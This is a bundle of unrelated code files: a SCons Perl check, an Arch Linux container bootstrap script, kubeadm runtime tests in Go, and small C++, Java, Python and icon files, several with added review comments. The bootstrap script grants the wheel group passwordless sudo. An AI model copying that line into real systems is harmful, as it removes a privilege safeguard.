    return out.decode("utf8")
def CheckPerl(ctx):
    """SCons configure check for a usable Perl toolchain.

    Writes a short Perl probe to .perltest.pl that records the interpreter
    path, the ExtUtils typemap, the xsubpp driver and the CORE include
    directory in .perlconfig.txt, runs it, reports the result to the
    configure context and removes the probe file.

    Returns True if the probe exited successfully.
    """
    ctx.Message("Checking Perl configuration... ")
    # BUGFIX: the xsubpp line previously read
    #   search(\@INC, "ExtUtils/xsubpp" || search([File::Spec->path()], "xsubpp"))
    # i.e. the '||' was inside the first argument list; the truthy string
    # literal short-circuited it, so the PATH fallback never ran. The
    # parentheses now group the two search() calls as intended.
    source = """
use strict;
use Config;
use File::Spec;
sub search {
    my $paths = shift;
    my $file = shift;
    foreach(@{$paths}) {
        if (-f "$_/$file") {
            return "$_/$file";
            last
        }
    }
    return;
}
my $coredir = File::Spec->catfile($Config{installarchlib}, "CORE");
open(F, ">", ".perlconfig.txt");
print F "perl=$Config{perlpath}\\n";
print F "typemap=" . search(\\@INC, "ExtUtils/typemap") . "\\n";
print F "xsubpp=" . (search(\\@INC, "ExtUtils/xsubpp") || search([File::Spec->path()], "xsubpp")) . "\\n";
print F "coredir=$coredir\\n";
close F;
"""
    # Context manager guarantees the probe file is flushed and closed.
    with open(".perltest.pl", "w") as f:
        f.write(source)
    try:
        retcode = subprocess.call("perl .perltest.pl", shell=True)
        ctx.Result(retcode == 0)
    finally:
        # Always remove the probe, even if running perl raised.
        os.unlink(".perltest.pl")
    return retcode == 0
|
#!/bin/bash
# Bootstrap an Arch Linux environment for webgetpics: staged pacman upgrade
# across the 2014-12-29 database-format change, build user creation, and
# toolchain installation. Expects AA_* variables from share.sh.
set -e
. /webgetpics-www/setup/share.sh
# Disable pacman's free-space check (can fail inside containers/chroots)
sed 's/^CheckSpace/#CheckSpace/g' -i /etc/pacman.conf
pacman-key --refresh-keys
# Pacman database has changed in version 4.2 on 2014-12-29.
# Need to upgrade it first before going any further.
echo "Server = $AA_ROOT/repos/2014/12/28/\$repo/os/\$arch" \
    > /etc/pacman.d/mirrorlist
pacman -Syyuu --noconfirm
echo "Server = $AA_ROOT/repos/2014/12/29/\$repo/os/\$arch" \
    > /etc/pacman.d/mirrorlist
pacman -Sy --noconfirm pacman
pacman-db-upgrade
pacman -Syyuu --noconfirm
# Finish the upgrade against the target snapshot date taken from share.sh.
echo "Server = $AA_ROOT/repos/$AA_YEAR/$AA_MONTH/$AA_DAY/\$repo/os/\$arch" \
    > /etc/pacman.d/mirrorlist
pacman -Syyuu --noconfirm
pacman -S --noconfirm --needed base base-devel rsyslog sudo
paccache -rk0
# Build user: fixed UID 1000, passwordless sudo via the wheel group.
useradd -u 1000 -m user -G wheel
chmod +w /etc/sudoers
echo '%wheel ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
chown -R user:user /webgetpics-www
pacman -S --noconfirm --needed git imagemagick npm openssh
# Continue setup unprivileged, then drop cached packages.
sudo -u user bash -l /webgetpics-www/setup/as-user.sh
paccache -rk0
|
<filename>1704-Determine if String Halves Are Alike/cpp_1704/Solution1.h
/**
* @author ooooo
* @date 2021/1/24 17:14
*/
#ifndef CPP_1704__SOLUTION1_H_
#define CPP_1704__SOLUTION1_H_
#include <iostream>
#include <vector>
#include <unordered_set>
#include <unordered_map>
#include <queue>
#include <stack>
#include <numeric>
using namespace std;
class Solution {
 public:
    // LeetCode 1704: true iff both halves of s contain the same number of
    // vowels (case-insensitive). Uses a single running balance instead of
    // two separate counters.
    bool halvesAreAlike(string s) {
        const string vowels = "aeiouAEIOU";
        const int n = s.size();
        int balance = 0;
        for (int i = 0; i < n; ++i) {
            if (vowels.find(s[i]) != string::npos) {
                balance += (i < n / 2) ? 1 : -1;
            }
        }
        return balance == 0;
    }
};
#endif //CPP_1704__SOLUTION1_H_
|
<reponame>lananh265/social-network<filename>node_modules/react-icons-kit/md/ic_emoji_emotions_twotone.js
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.ic_emoji_emotions_twotone = void 0;
var ic_emoji_emotions_twotone = {
"viewBox": "0 0 24 24",
"children": [{
"name": "g",
"attribs": {},
"children": [{
"name": "rect",
"attribs": {
"fill": "none",
"height": "24",
"width": "24"
},
"children": [{
"name": "rect",
"attribs": {
"fill": "none",
"height": "24",
"width": "24"
},
"children": []
}]
}]
}, {
"name": "g",
"attribs": {},
"children": [{
"name": "g",
"attribs": {},
"children": [{
"name": "g",
"attribs": {},
"children": []
}]
}, {
"name": "g",
"attribs": {},
"children": [{
"name": "g",
"attribs": {},
"children": [{
"name": "path",
"attribs": {
"d": "M20,12c0-4.42-3.58-8-8-8s-8,3.58-8,8s3.58,8,8,8S20,16.42,20,12z M8.5,8C9.33,8,10,8.67,10,9.5 S9.33,11,8.5,11S7,10.33,7,9.5S7.67,8,8.5,8z M12,18c-2.28,0-4.22-1.66-5-4h10C16.22,16.34,14.28,18,12,18z M15.5,11 c-0.83,0-1.5-0.67-1.5-1.5S14.67,8,15.5,8S17,8.67,17,9.5S16.33,11,15.5,11z",
"opacity": ".3"
},
"children": [{
"name": "path",
"attribs": {
"d": "M20,12c0-4.42-3.58-8-8-8s-8,3.58-8,8s3.58,8,8,8S20,16.42,20,12z M8.5,8C9.33,8,10,8.67,10,9.5 S9.33,11,8.5,11S7,10.33,7,9.5S7.67,8,8.5,8z M12,18c-2.28,0-4.22-1.66-5-4h10C16.22,16.34,14.28,18,12,18z M15.5,11 c-0.83,0-1.5-0.67-1.5-1.5S14.67,8,15.5,8S17,8.67,17,9.5S16.33,11,15.5,11z",
"opacity": ".3"
},
"children": []
}]
}, {
"name": "circle",
"attribs": {
"cx": "15.5",
"cy": "9.5",
"r": "1.5"
},
"children": [{
"name": "circle",
"attribs": {
"cx": "15.5",
"cy": "9.5",
"r": "1.5"
},
"children": []
}]
}, {
"name": "circle",
"attribs": {
"cx": "8.5",
"cy": "9.5",
"r": "1.5"
},
"children": [{
"name": "circle",
"attribs": {
"cx": "8.5",
"cy": "9.5",
"r": "1.5"
},
"children": []
}]
}, {
"name": "path",
"attribs": {
"d": "M11.99,2C6.47,2,2,6.48,2,12c0,5.52,4.47,10,9.99,10C17.52,22,22,17.52,22,12C22,6.48,17.52,2,11.99,2z M12,20 c-4.42,0-8-3.58-8-8c0-4.42,3.58-8,8-8s8,3.58,8,8C20,16.42,16.42,20,12,20z"
},
"children": [{
"name": "path",
"attribs": {
"d": "M11.99,2C6.47,2,2,6.48,2,12c0,5.52,4.47,10,9.99,10C17.52,22,22,17.52,22,12C22,6.48,17.52,2,11.99,2z M12,20 c-4.42,0-8-3.58-8-8c0-4.42,3.58-8,8-8s8,3.58,8,8C20,16.42,16.42,20,12,20z"
},
"children": []
}]
}, {
"name": "path",
"attribs": {
"d": "M12,18c2.28,0,4.22-1.66,5-4H7C7.78,16.34,9.72,18,12,18z"
},
"children": [{
"name": "path",
"attribs": {
"d": "M12,18c2.28,0,4.22-1.66,5-4H7C7.78,16.34,9.72,18,12,18z"
},
"children": []
}]
}]
}]
}]
}]
};
exports.ic_emoji_emotions_twotone = ic_emoji_emotions_twotone; |
#pragma once
#include <algorithm>
#include <sstream>
#include <string>
#include <string_view>
#include <utility>
#include <vector>
#include "filesys.h"
// Returns true when `path` has an extension equal to one of the extensions
// in the half-open range [begin, end).
//
// BUGFIX: the extension is materialized as a std::string before the search.
// The previous code passed path.extension().c_str() to std::find, which
// degenerates to raw pointer comparison when the range holds C string
// literals (const char*), and so could never match.
template<typename T>
bool matches_extension(const fs::path &path, T begin, T end) {
    if (!path.has_extension()) {
        return false;
    }
    const std::string extension = path.extension().string();
    return std::find(begin, end, extension) != end;
}
// True when `path` names a C/C++ implementation file — presumably decided
// by extension via matches_extension; confirm in the implementation.
bool is_source_file(const fs::path &path);
// True when `path` names a header file (see note above).
bool is_header_file(const fs::path &path);
// Tokenizes a command line into its argument vector.
std::vector<std::string> split_command(const std::string &command_line);
// Replaces occurrences of `to_replace` in `str` with `replace_with`, in place.
void replace_pattern_with(std::string &str, std::string_view to_replace, std::string_view replace_with);
|
#!/bin/bash
# Auto-generated Kaldi grid-job wrapper (queue.pl style): averages the eight
# parallel nnet models of iteration 149 into exp/nnet4a/149.mdl with adjusted
# per-layer learning rates, logging host/time/command and accounting info.
cd /home/nlpserver/zzilong/kaldi/egs/supermarket-product
. ./path.sh
# Record host, start time and the exact command at the top of the log file.
( echo '#' Running on `hostname`
echo '#' Started at `date`
echo -n '# '; cat <<EOF
nnet-am-average exp/nnet4a/149.1.mdl exp/nnet4a/149.2.mdl exp/nnet4a/149.3.mdl exp/nnet4a/149.4.mdl exp/nnet4a/149.5.mdl exp/nnet4a/149.6.mdl exp/nnet4a/149.7.mdl exp/nnet4a/149.8.mdl - | nnet-am-copy --learning-rates=0.00527762050880116:0.00263881025440058:0.00263881025440058 - exp/nnet4a/149.mdl
EOF
) >exp/nnet4a/log/average.148.log
time1=`date +"%s"`
( nnet-am-average exp/nnet4a/149.1.mdl exp/nnet4a/149.2.mdl exp/nnet4a/149.3.mdl exp/nnet4a/149.4.mdl exp/nnet4a/149.5.mdl exp/nnet4a/149.6.mdl exp/nnet4a/149.7.mdl exp/nnet4a/149.8.mdl - | nnet-am-copy --learning-rates=0.00527762050880116:0.00263881025440058:0.00263881025440058 - exp/nnet4a/149.mdl ) 2>>exp/nnet4a/log/average.148.log >>exp/nnet4a/log/average.148.log
ret=$?
time2=`date +"%s"`
echo '#' Accounting: time=$(($time2-$time1)) threads=1 >>exp/nnet4a/log/average.148.log
echo '#' Finished at `date` with status $ret >>exp/nnet4a/log/average.148.log
# Exit status 137 (SIGKILL, typically OOM) is mapped to 100 so the queue retries the job.
[ $ret -eq 137 ] && exit 100;
touch exp/nnet4a/q/done.11044
exit $[$ret ? 1 : 0]
## submitted with:
# qsub -v PATH -cwd -S /bin/bash -j y -l arch=*64* -o exp/nnet4a/q/average.148.log -l mem_free=10G,ram_free=2G,arch=*64 /home/nlpserver/zzilong/kaldi/egs/supermarket-product/exp/nnet4a/q/average.148.sh >>exp/nnet4a/q/average.148.log 2>&1
|
# Launch ISP training with an HRNet32 backbone on Market-1501 using 7-part
# pseudo labels; trailing KEY "(VALUE)" pairs override the YAML config.
# NOTE(review): presumably a person re-identification run (Market-1501) — confirm.
python3 tools/train.py --config_file='configs/softmax_triplet.yml' MODEL.DEVICE_ID "('1')" MODEL.NAME "('HRNet32')" MODEL.PRETRAIN_PATH "('checkpoints/hrnetv2_w32_imagenet_pretrained.pth')" DATASETS.NAMES "('market1501')" DATASETS.ROOT_DIR "('/data/market1501')" CLUSTERING.PART_NUM "(7)" DATASETS.PSEUDO_LABEL_SUBDIR "('train_pseudo_labels-ISP-7')" OUTPUT_DIR "('./log/ISP-market-7')"
|
/*
Copyright 2018 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package util
import (
"io/ioutil"
"net"
"os"
"reflect"
"runtime"
"testing"
"github.com/pkg/errors"
"k8s.io/utils/exec"
fakeexec "k8s.io/utils/exec/testing"
"k8s.io/kubernetes/cmd/kubeadm/app/constants"
)
// TestNewContainerRuntime exercises runtime construction for the default
// Docker socket and CRI socket paths/URLs, with and without a usable
// crictl binary on PATH (LookPathFunc decides which).
func TestNewContainerRuntime(t *testing.T) {
	execLookPathOK := fakeexec.FakeExec{
		LookPathFunc: func(cmd string) (string, error) { return "/usr/bin/crictl", nil },
	}
	execLookPathErr := fakeexec.FakeExec{
		LookPathFunc: func(cmd string) (string, error) { return "", errors.Errorf("%s not found", cmd) },
	}
	cases := []struct {
		name      string
		execer    fakeexec.FakeExec
		criSocket string
		isDocker  bool
		isError   bool
	}{
		{"valid: default cri socket", execLookPathOK, constants.DefaultDockerCRISocket, true, false},
		{"valid: cri-o socket url", execLookPathOK, "unix:///var/run/crio/crio.sock", false, false},
		{"valid: cri-o socket path", execLookPathOK, "/var/run/crio/crio.sock", false, false},
		{"invalid: no crictl", execLookPathErr, "unix:///var/run/crio/crio.sock", false, true},
	}
	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			runtime, err := NewContainerRuntime(&tc.execer, tc.criSocket)
			if err != nil {
				if !tc.isError {
					t.Fatalf("unexpected NewContainerRuntime error. criSocket: %s, error: %v", tc.criSocket, err)
				}
				return // expected error occurs, impossible to test runtime further
			}
			// NOTE(review): err is always nil on this path, so this only fires
			// for cases that expected an error but constructed successfully.
			if tc.isError && err == nil {
				t.Fatalf("unexpected NewContainerRuntime success. criSocket: %s", tc.criSocket)
			}
			isDocker := runtime.IsDocker()
			if tc.isDocker != isDocker {
				t.Fatalf("unexpected isDocker() result %v for the criSocket %s", isDocker, tc.criSocket)
			}
		})
	}
}
// genFakeActions builds num identical FakeCommandAction entries, each wiring
// an invoked command to the shared scripted FakeCmd.
func genFakeActions(fcmd *fakeexec.FakeCmd, num int) []fakeexec.FakeCommandAction {
	var actions []fakeexec.FakeCommandAction
	for count := 0; count < num; count++ {
		actions = append(actions, func(command string, arguments ...string) exec.Cmd {
			return fakeexec.InitFakeCmd(fcmd, command, arguments...)
		})
	}
	return actions
}
// TestIsRunning checks runtime.IsRunning() against a scripted sequence of
// CombinedOutput results. Script entries are consumed in table order:
// ok, exit-1, ok, exit-1 — one per test case below.
func TestIsRunning(t *testing.T) {
	fcmd := fakeexec.FakeCmd{
		CombinedOutputScript: []fakeexec.FakeAction{
			func() ([]byte, []byte, error) { return nil, nil, nil },
			func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
			func() ([]byte, []byte, error) { return nil, nil, nil },
			func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
		},
	}
	criExecer := fakeexec.FakeExec{
		CommandScript: genFakeActions(&fcmd, len(fcmd.CombinedOutputScript)),
		LookPathFunc:  func(cmd string) (string, error) { return "/usr/bin/crictl", nil },
	}
	dockerExecer := fakeexec.FakeExec{
		CommandScript: genFakeActions(&fcmd, len(fcmd.CombinedOutputScript)),
		LookPathFunc:  func(cmd string) (string, error) { return "/usr/bin/docker", nil },
	}
	cases := []struct {
		name      string
		criSocket string
		execer    fakeexec.FakeExec
		isError   bool
	}{
		{"valid: CRI-O is running", "unix:///var/run/crio/crio.sock", criExecer, false},
		{"invalid: CRI-O is not running", "unix:///var/run/crio/crio.sock", criExecer, true},
		{"valid: docker is running", constants.DefaultDockerCRISocket, dockerExecer, false},
		{"invalid: docker is not running", constants.DefaultDockerCRISocket, dockerExecer, true},
	}
	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			runtime, err := NewContainerRuntime(&tc.execer, tc.criSocket)
			if err != nil {
				t.Fatalf("unexpected NewContainerRuntime error: %v", err)
			}
			// IsRunning returns an error value, not a bool.
			isRunning := runtime.IsRunning()
			if tc.isError && isRunning == nil {
				t.Error("unexpected IsRunning() success")
			}
			if !tc.isError && isRunning != nil {
				t.Error("unexpected IsRunning() error")
			}
		})
	}
}
// TestListKubeContainers verifies ListKubeContainers splits the scripted
// "ps"-style output into container names. Script entries are consumed in
// table order: ok, exit-1, ok.
func TestListKubeContainers(t *testing.T) {
	fcmd := fakeexec.FakeCmd{
		CombinedOutputScript: []fakeexec.FakeAction{
			func() ([]byte, []byte, error) { return []byte("k8s_p1\nk8s_p2"), nil, nil },
			func() ([]byte, []byte, error) { return nil, nil, &fakeexec.FakeExitError{Status: 1} },
			func() ([]byte, []byte, error) { return []byte("k8s_p1\nk8s_p2"), nil, nil },
		},
	}
	execer := fakeexec.FakeExec{
		CommandScript: genFakeActions(&fcmd, len(fcmd.CombinedOutputScript)),
		LookPathFunc:  func(cmd string) (string, error) { return "/usr/bin/crictl", nil },
	}
	cases := []struct {
		name      string
		criSocket string
		isError   bool
	}{
		{"valid: list containers using CRI socket url", "unix:///var/run/crio/crio.sock", false},
		{"invalid: list containers using CRI socket url", "unix:///var/run/crio/crio.sock", true},
		{"valid: list containers using docker", constants.DefaultDockerCRISocket, false},
	}
	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			runtime, err := NewContainerRuntime(&execer, tc.criSocket)
			if err != nil {
				t.Fatalf("unexpected NewContainerRuntime error: %v", err)
			}
			containers, err := runtime.ListKubeContainers()
			if tc.isError {
				if err == nil {
					t.Errorf("unexpected ListKubeContainers success")
				}
				return
			} else if err != nil {
				t.Errorf("unexpected ListKubeContainers error: %v", err)
			}
			// The newline-separated fake output must come back as a slice.
			if !reflect.DeepEqual(containers, []string{"k8s_p1", "k8s_p2"}) {
				t.Errorf("unexpected ListKubeContainers output: %v", containers)
			}
		})
	}
}
// TestRemoveContainers checks RemoveContainers over three containers per
// case. The fake script rows are consumed in order; each case presumably
// issues a stop plus a remove per container (hence the 5–6 entries per
// row) — the exact per-case consumption depends on the implementation.
func TestRemoveContainers(t *testing.T) {
	fakeOK := func() ([]byte, []byte, error) { return nil, nil, nil }
	fakeErr := func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} }
	fcmd := fakeexec.FakeCmd{
		CombinedOutputScript: []fakeexec.FakeAction{
			fakeOK, fakeOK, fakeOK, fakeOK, fakeOK, fakeOK, // Test case 1
			fakeOK, fakeOK, fakeOK, fakeErr, fakeOK, fakeOK,
			fakeErr, fakeOK, fakeOK, fakeErr, fakeOK,
			fakeOK, fakeOK, fakeOK, fakeOK, fakeOK, fakeOK,
			fakeOK, fakeOK, fakeOK, fakeErr, fakeOK, fakeOK,
			fakeErr, fakeOK, fakeOK, fakeErr, fakeOK,
		},
	}
	execer := fakeexec.FakeExec{
		CommandScript: genFakeActions(&fcmd, len(fcmd.CombinedOutputScript)),
		LookPathFunc:  func(cmd string) (string, error) { return "/usr/bin/crictl", nil },
	}
	cases := []struct {
		name       string
		criSocket  string
		containers []string
		isError    bool
	}{
		{"valid: remove containers using CRI", "unix:///var/run/crio/crio.sock", []string{"k8s_p1", "k8s_p2", "k8s_p3"}, false}, // Test case 1
		{"invalid: CRI rmp failure", "unix:///var/run/crio/crio.sock", []string{"k8s_p1", "k8s_p2", "k8s_p3"}, true},
		{"invalid: CRI stopp failure", "unix:///var/run/crio/crio.sock", []string{"k8s_p1", "k8s_p2", "k8s_p3"}, true},
		{"valid: remove containers using docker", constants.DefaultDockerCRISocket, []string{"k8s_c1", "k8s_c2", "k8s_c3"}, false},
		{"invalid: docker rm failure", constants.DefaultDockerCRISocket, []string{"k8s_c1", "k8s_c2", "k8s_c3"}, true},
		{"invalid: docker stop failure", constants.DefaultDockerCRISocket, []string{"k8s_c1", "k8s_c2", "k8s_c3"}, true},
	}
	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			runtime, err := NewContainerRuntime(&execer, tc.criSocket)
			if err != nil {
				t.Fatalf("unexpected NewContainerRuntime error: %v, criSocket: %s", err, tc.criSocket)
			}
			err = runtime.RemoveContainers(tc.containers)
			if !tc.isError && err != nil {
				t.Errorf("unexpected RemoveContainers errors: %v, criSocket: %s, containers: %v", err, tc.criSocket, tc.containers)
			}
			if tc.isError && err == nil {
				t.Errorf("unexpected RemoveContainers success, criSocket: %s, containers: %v", tc.criSocket, tc.containers)
			}
		})
	}
}
// TestPullImage verifies PullImage against scripted pulls: one success,
// then five consecutive failures (pulls are retried 5 times, see
// PullImageRetry in constants/constants.go) — repeated for CRI and docker.
func TestPullImage(t *testing.T) {
	fcmd := fakeexec.FakeCmd{
		CombinedOutputScript: []fakeexec.FakeAction{
			func() ([]byte, []byte, error) { return nil, nil, nil },
			// If the pull fails, it will be retried 5 times (see PullImageRetry in constants/constants.go)
			func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
			func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
			func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
			func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
			func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
			func() ([]byte, []byte, error) { return nil, nil, nil },
			// If the pull fails, it will be retried 5 times (see PullImageRetry in constants/constants.go)
			func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
			func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
			func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
			func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
			func() ([]byte, []byte, error) { return []byte("error"), nil, &fakeexec.FakeExitError{Status: 1} },
		},
	}
	execer := fakeexec.FakeExec{
		CommandScript: genFakeActions(&fcmd, len(fcmd.CombinedOutputScript)),
		LookPathFunc:  func(cmd string) (string, error) { return "/usr/bin/crictl", nil },
	}
	cases := []struct {
		name      string
		criSocket string
		image     string
		isError   bool
	}{
		{"valid: pull image using CRI", "unix:///var/run/crio/crio.sock", "image1", false},
		{"invalid: CRI pull error", "unix:///var/run/crio/crio.sock", "image2", true},
		{"valid: pull image using docker", constants.DefaultDockerCRISocket, "image1", false},
		{"invalid: docker pull error", constants.DefaultDockerCRISocket, "image2", true},
	}
	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			runtime, err := NewContainerRuntime(&execer, tc.criSocket)
			if err != nil {
				t.Fatalf("unexpected NewContainerRuntime error: %v, criSocket: %s", err, tc.criSocket)
			}
			err = runtime.PullImage(tc.image)
			if !tc.isError && err != nil {
				t.Errorf("unexpected PullImage error: %v, criSocket: %s, image: %s", err, tc.criSocket, tc.image)
			}
			if tc.isError && err == nil {
				t.Errorf("unexpected PullImage success, criSocket: %s, image: %s", tc.criSocket, tc.image)
			}
		})
	}
}
// TestImageExists verifies ContainerRuntime.ImageExists against a scripted
// fake exec: a nil error from the fake "inspect" command means the image
// exists, a FakeExitError means it does not.
func TestImageExists(t *testing.T) {
	// One FakeAction is consumed per test case below, in order.
	fcmd := fakeexec.FakeCmd{
		RunScript: []fakeexec.FakeAction{
			func() ([]byte, []byte, error) { return nil, nil, nil },
			func() ([]byte, []byte, error) { return nil, nil, &fakeexec.FakeExitError{Status: 1} },
			func() ([]byte, []byte, error) { return nil, nil, nil },
			func() ([]byte, []byte, error) { return nil, nil, &fakeexec.FakeExitError{Status: 1} },
		},
	}
	execer := fakeexec.FakeExec{
		CommandScript: genFakeActions(&fcmd, len(fcmd.RunScript)),
		LookPathFunc:  func(cmd string) (string, error) { return "/usr/bin/crictl", nil },
	}
	// NOTE: result==true marks the cases whose inspect command fails, i.e.
	// ImageExists is expected to return false — hence !tc.result below.
	cases := []struct {
		name      string
		criSocket string
		image     string
		result    bool
	}{
		{"valid: test if image exists using CRI", "unix:///var/run/crio/crio.sock", "image1", false},
		{"invalid: CRI inspecti failure", "unix:///var/run/crio/crio.sock", "image2", true},
		{"valid: test if image exists using docker", constants.DefaultDockerCRISocket, "image1", false},
		{"invalid: docker inspect failure", constants.DefaultDockerCRISocket, "image2", true},
	}
	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			runtime, err := NewContainerRuntime(&execer, tc.criSocket)
			if err != nil {
				t.Fatalf("unexpected NewContainerRuntime error: %v, criSocket: %s", err, tc.criSocket)
			}
			result, err := runtime.ImageExists(tc.image)
			if !tc.result != result {
				// BUGFIX: the message previously passed err to the %t verb,
				// omitted the actual boolean result, and printed tc.result as
				// the expectation instead of !tc.result.
				t.Errorf("unexpected ImageExists result: %t (err: %v), criSocket: %s, image: %s, expected result: %t", result, err, tc.criSocket, tc.image, !tc.result)
			}
		})
	}
}
// TestIsExistingSocket checks that isExistingSocket recognizes a live UNIX
// domain socket and rejects regular files and missing paths.
func TestIsExistingSocket(t *testing.T) {
	// UNIX domain sockets are exercised here, so skip the whole test on Windows.
	if runtime.GOOS == "windows" {
		return
	}
	const tempPrefix = "test.kubeadm.runtime.isExistingSocket."
	cases := []struct {
		name string
		run  func(*testing.T)
	}{
		{
			name: "Valid domain socket is detected as such",
			run: func(t *testing.T) {
				// Reserve a unique path, then replace the file with a listening socket.
				f, err := ioutil.TempFile("", tempPrefix)
				if err != nil {
					t.Fatalf("unexpected error by TempFile: %v", err)
				}
				sockPath := f.Name()
				os.Remove(sockPath)
				f.Close()
				listener, err := net.Listen("unix", sockPath)
				if err != nil {
					t.Fatalf("unexpected error while dialing a socket: %v", err)
				}
				defer listener.Close()
				if !isExistingSocket(sockPath) {
					t.Fatalf("isExistingSocket(%q) gave unexpected result. Should have been true, instead of false", sockPath)
				}
			},
		},
		{
			name: "Regular file is not a domain socket",
			run: func(t *testing.T) {
				f, err := ioutil.TempFile("", tempPrefix)
				if err != nil {
					t.Fatalf("unexpected error by TempFile: %v", err)
				}
				filePath := f.Name()
				defer os.Remove(filePath)
				f.Close()
				if isExistingSocket(filePath) {
					t.Fatalf("isExistingSocket(%q) gave unexpected result. Should have been false, instead of true", filePath)
				}
			},
		},
		{
			name: "Non existent socket is not a domain socket",
			run: func(t *testing.T) {
				const missingPath = "/non/existent/socket"
				if isExistingSocket(missingPath) {
					t.Fatalf("isExistingSocket(%q) gave unexpected result. Should have been false, instead of true", missingPath)
				}
			},
		},
	}
	for _, tc := range cases {
		t.Run(tc.name, tc.run)
	}
}
// TestDetectCRISocketImpl feeds detectCRISocketImpl a fake "does this socket
// exist" predicate and checks the chosen CRI socket / error for various
// combinations of present runtimes.
func TestDetectCRISocketImpl(t *testing.T) {
	cases := []struct {
		name            string
		existingSockets []string
		expectedError   bool
		expectedSocket  string
	}{
		{
			name:            "No existing sockets, use Docker",
			existingSockets: []string{},
			expectedError:   false,
			expectedSocket:  constants.DefaultDockerCRISocket,
		},
		{
			name:            "One valid CRI socket leads to success",
			existingSockets: []string{"/var/run/crio/crio.sock"},
			expectedError:   false,
			expectedSocket:  "/var/run/crio/crio.sock",
		},
		{
			name:            "Correct Docker CRI socket is returned",
			existingSockets: []string{"/var/run/docker.sock"},
			expectedError:   false,
			expectedSocket:  constants.DefaultDockerCRISocket,
		},
		{
			name: "CRI and Docker sockets lead to an error",
			existingSockets: []string{
				"/var/run/docker.sock",
				"/var/run/crio/crio.sock",
			},
			expectedError: true,
		},
		{
			name: "Docker and containerd lead to Docker being used",
			existingSockets: []string{
				"/var/run/docker.sock",
				"/run/containerd/containerd.sock",
			},
			expectedError:  false,
			expectedSocket: constants.DefaultDockerCRISocket,
		},
		{
			name: "A couple of CRI sockets lead to an error",
			existingSockets: []string{
				"/var/run/crio/crio.sock",
				"/run/containerd/containerd.sock",
			},
			expectedError: true,
		},
	}
	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			// Model the fake filesystem as a set for O(1) membership checks.
			existing := make(map[string]bool, len(tc.existingSockets))
			for _, s := range tc.existingSockets {
				existing[s] = true
			}
			socket, err := detectCRISocketImpl(func(path string) bool {
				return existing[path]
			})
			gotError := err != nil
			if gotError != tc.expectedError {
				t.Fatalf("detectCRISocketImpl returned unexpected result\n\tExpected error: %t\n\tGot error: %t", tc.expectedError, gotError)
			}
			if !tc.expectedError && socket != tc.expectedSocket {
				t.Fatalf("detectCRISocketImpl returned unexpected CRI socket\n\tExpected socket: %s\n\tReturned socket: %s",
					tc.expectedSocket, socket)
			}
		})
	}
}
|
import torch
from torch.utils.data import DataLoader
from torchvision.transforms import Compose
# Assuming the ScienceDataset class and train_augment function are defined elsewhere
# Define the custom data loader
class ScienceDataLoader(DataLoader):
    """Thin convenience wrapper around :class:`torch.utils.data.DataLoader`.

    Shuffling defaults to ``True`` (the original hard-coded behavior) but can
    now be disabled, e.g. for a validation loader.

    Args:
        dataset: any map-style dataset (anything with ``__len__``/``__getitem__``).
        batch_size (int): number of samples per batch.
        shuffle (bool): whether to reshuffle every epoch. Defaults to ``True``.
    """

    def __init__(self, dataset, batch_size, shuffle=True):
        # Zero-argument super() is the Python 3 idiom; replaces the legacy
        # super(ScienceDataLoader, self) form.
        super().__init__(dataset, batch_size=batch_size, shuffle=shuffle)
# Set the batch size
batch_size = 1
# Set up the training dataset using ScienceDataset and train_augment
# NOTE(review): ScienceDataset, cfg and train_augment are assumed to be defined
# elsewhere in the project — not visible from here. The split name 'test'
# combined with mode='train' looks suspicious; confirm against ScienceDataset's
# constructor.
train_dataset = ScienceDataset(cfg, 'test', mode='train', transform=train_augment)
# Create a composed transformation if needed
# transform = Compose([train_augment, other_transforms])
# Initialize the data loader with the training dataset and batch size
# (ScienceDataLoader shuffles; see the class above).
train_loader = ScienceDataLoader(train_dataset, batch_size)
/**
 * Template-method base class for pasta dishes: {@link #makeRecipe()} fixes the
 * order of the cooking steps, while subclasses supply the dish-specific steps.
 *
 * NOTE(review): "addSouce" is presumably a typo for "addSauce"; renaming it
 * would break existing subclasses, so it is left untouched here.
 */
public abstract class PastaDish {
    /**
     * The template method: runs the recipe steps in a fixed order.
     * Declared {@code final} so subclasses cannot reorder the skeleton.
     */
    public final void makeRecipe() {
        boilWater();
        addPasta();
        addProtein();
        addSouce();
    }
    /** Invariant step shared by every dish. */
    private void boilWater() {
        System.out.println("Boiling Water");//its same to all subclasses
    }
    /** Dish-specific step: which pasta to add. */
    protected abstract void addPasta();//this methods contents
    /** Dish-specific step: which protein to add. */
    protected abstract void addProtein();// always changing
    /** Dish-specific step: which sauce to add. */
    protected abstract void addSouce();//via subclasses
}
|
